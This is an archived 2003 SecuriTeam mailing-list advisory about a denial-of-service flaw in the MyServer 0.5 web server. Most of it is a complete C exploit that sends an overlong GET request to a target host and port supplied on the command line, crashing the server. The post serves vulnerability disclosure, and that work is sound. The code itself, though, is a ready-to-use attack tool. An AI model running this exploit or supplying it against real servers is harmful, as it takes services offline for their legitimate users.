[NEWS] MyServer DoS (Long GET request)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/17/03

  • Next message: SecuriTeam: "[UNIX] Xinetd Memory Leaks" 
    To: list@securiteam.com
Date: 17 Nov 2003 17:12:02 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      MyServer DoS (Long GET request)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.myserverproject.net/forum/portal.php> MyServer is "a free and
    easy to configure web server" available for both the Windows and UNIX
    platforms. A denial of service vulnerability has been found in the product
    allowing remote attackers to cause the server to no longer respond to
    legitimate users.

    DETAILS

    Exploit:
    /* MyServer 0.5 DoS
       vendor:
       http://myserverweb.sourceforge.net
     
       coded and discovered by:
       badpack3t <badpack3t@security-protocols.com>
       for .:sp research labs:.
       www.security-protocols.com
       11.12.2003
      
       usage:
       sp-myserv <targetip> [targetport] (default is 80)
     */

    #include <winsock2.h>
    #include <stdio.h>

    #pragma comment(lib, "ws2_32.lib")

    char exploit2[65536];
    int main(int argc, char *argv[])
    {
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent *pTarget;
      struct sockaddr_in sock;
      char *target;
      int port,bufsize, count;
      SOCKET mysocket;
      
      strcpy(exploit2, "GET /");

      for (count = 0; count < 455; count ++) // L: 275 H:455
      {
        strcat(exploit2, "A");
      }
      strcat(exploit2, ".html HTTP/1.0\r\n\r\n");

      if (argc < 2)
      {
        printf("MyServer 0.5 DoS by badpack3t\r\n
    <badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
        printf("Usage:\r\n %s <targetip> [targetport] (default is
    80)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n", argv[0]);
        exit(1);
      }

      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

      target = argv[1];
      port = 80;

      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 1024;
      if (argc >= 4) bufsize = atoi(argv[3]);

      mysocket = socket(AF_INET, SOCK_STREAM, 0);
      if(mysocket==INVALID_SOCKET)
      {
        printf("Socket error!\r\n");
        exit(1);
      }

      printf("Resolving Hostnames...\n");
      if ((pTarget = gethostbyname(target)) == NULL)
      {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
      }

      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);

      printf("Connecting...\n");
      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
      {
        printf("Couldn't connect to host.\n");
        exit(1);
      }

      printf("Connected!...\n");
      printf("Sending Payload...\n");
      if (send(mysocket, exploit2, strlen(exploit2), 0) == -1)
      {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
      }

      printf("Remote Webserver has been DoS'ed \r\n");
      closesocket(mysocket);
      WSACleanup();
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:badpack3t@security-protocols.com> badpack3t.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Xinetd Memory Leaks"

    Relevant Pages